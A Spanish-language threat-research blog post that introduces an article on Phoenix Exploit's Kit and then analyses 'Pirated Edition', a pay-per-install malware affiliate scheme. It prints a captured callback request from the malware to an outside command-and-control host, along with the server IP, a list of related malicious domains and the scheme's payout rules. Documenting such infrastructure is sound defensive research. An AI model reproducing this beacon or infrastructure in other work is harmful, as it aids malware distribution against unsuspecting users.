Las alternativas delictivas crecen muy rápidamente dentro de un ecosistema donde día a día se gestan oportunidades de negocios por intermedio de procesos fraudulentos. En este sentido, la demanda de recursos delictivos para los ciberdelincuentes no se hace esperar y crece constantemente.

Generalmente aparecen nuevos crimeware que buscan obtener un lugar y buena aceptación en las calles virtuales del mundo underground, intentando reflejar un equilibrio en torno al costo/beneficio del "producto" promocionado, que les permita a los delincuentes insertarse en el mercado lo más rápida posible.

Del mismo modo, crimeware ya aceptado en el circuito y muy conocido se actualizan buscando optimizar su “calidad de servicio”. Phoenix Exploit’s Kit, a pesar de su estado minimalista frente a otros de su estilo, es uno de los crimeware con más actividad maliciosa en la actualidad.

El presente artículo expone una serie de datos respecto a las actividades delictivas y fraudulentas llevadas a cabo empleando Phoenix Exploit’s Kit como canal de gestión, cómo es habitualmente el ciclo de negocio delictivo en torno a este crimeware y cuáles son los exploits presentes en sus diferentes versiones.

Phoenix Exploit’s Kit v2.3r
Phoenix Exploit’s Kit v2.3
Phoenix Exploit’s Kit v2.21
Phoenix Exploit’s Kit v2.2
Phoenix Exploit’s Kit v2.1
Phoenix Exploit’s Kit v2.0
Phoenix Exploit’s Kit v1.4
Phoenix Exploit’s Kit v1.31
Phoenix Exploit’s Kit v1.3
Phoenix Exploit’s Kit v1.2
Phoenix Exploit’s Kit v1.1
Phoenix Exploit’s Kit v1.0
Phoenix Exploit’s Kit v1.0beta

Versión en español | Versión en inglés

Otros artículos de MalwareIntelligence

Ver más

16.8.10

Pirated Edition. Programa de afiliados Pay-per-Install

Los programas de afiliados constituyen un modelo de negocio cada vez más redituable para los delincuentes, además de crear un completo circuito de propagación/infección de malware entre muchas otras alternativas, incentivando a sus clientes con un porcentaje de dinero que obtienen en función del éxito en su propio negocio.

Uno de los sistemas con mayor captación en este modelo de negocio lo constituye el pago por instalación, Pay-per-Install, donde cada cliente obtiene el dinero por la instalación de un malware. Es decir, solamente por propagar malware y esperar que alguien se infecte.

Bajo este circuito, cada afiliado puede ser tanto una sola persona como una botnet, ya que evidentemente el rédito económico que generan los delincuentes diseminando el malware proporcionado por el sistema de afiliados se masifica, y el botmaster se beneficia con una diferencia económica más amplia dentro de un lapso de tiempo más corto, además de las otras vetas económicamente fraudulentas que se generan a través de botnets.

Otro de estos programas de afiliados es Pirated Edition, cuya panel de acceso podemos observar en la siguiente imagen.


Mirando dentro del sistema de afiliados, nos encontramos con un modelo extremadamente minimalista que sólo le permite al delincuente-cliente chequear la cantidad de dinero ganado y descargar el malware a propagar, incluyendo las actualizaciones de este.


Este código malicioso, cuyo nombre por defecto es limew.exe (757eda0929b94ea104a1a80825dee3e2) posee una tasa de detección muy baja. Según el reporte de VT, sólo es detectado por 8 de los 41 motores AV.

Cuando se ejecuta, se reporta al verdadero programa de afiliados que se esconde detrás de este circuito delictivo que, en este caso, responde a husseta.com.


/get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D456E757923271416411A111410015D404E1618156A1971090A03700302010C090B7D7D0C07790305727474047E060C7072786A2F27212634206E6563677130303E666C6E3866505404004204020A55584C041F1B0B1D4D442D42522A021413444A4B4C494E4CB3B5B7B0A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC892808394D7D1D9D7CE85898A8B8C8D8E8FF1E7A1ADA0A9FBAAA9A5BDAABEA8E3BDB5A2B7B2B7BDF8BBB7BABBB7B8B2B3BE898FC48A80849282D5D8D8D3DDDAD6DDC8C7C6D5B1BAA4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 011607da0826.husseta.com
Cache-Control: no-cache


Sin embargo, esta es sólo una de las caras que presenta la estrategia ya que en la misma IP (95.211.98.246) se resuelven otros dominios que cada uno de ellos lleva el mismo template.


010407da082d.deanard.com
082707d91010.bauhath.com
100407da083b.leyeshv.com
110407da0837.giselin.com
110507da031e.bauhath.com
111607da0732.giselin.com
131907da0726.deanard.com
142007da0712.weirden.com
142107da071c.giselin.com
151707da052e.antiona.com
160607d9110b.bauhath.com
161607da0722.leyeshv.com
162507da0612.mccorbet.com
171907da062d.bourgum.com
172307da072e.koralda.com
180507da0308.bauhath.com
181607da031b.derchy.com
182707da0130.bauhath.com
192507da071b.dativism.com
210907da020b.bauhath.com
222707d9101f.bourgum.com
222807d9092a.apomenbe.com

Vale aclarar un detalle particular de las políticas de este programa de afiliados. Para obtener el pago por cada instalación del malware, este debe infectar equipos que se encuentren en los siguientes países: Australia, Belgium, Brazil, Canada, Czech Republic, Denmark, Estonia, France, Germany, Greece, Finland, Hungary, Italy, Ireland, Kuwait, Lithuania, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Russia, Saudi Arabia, Singapore, Slovakia, Spain, Sweden, Switzerland, Turkey, Ukraine, United Arab Emirates, United Kingdom, United States and Japan. Y como sistema de pago se utilizan los servicios de Epassporte, AlertPay, PayPal y Webmoney.

Información relacionada
Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI

Ver más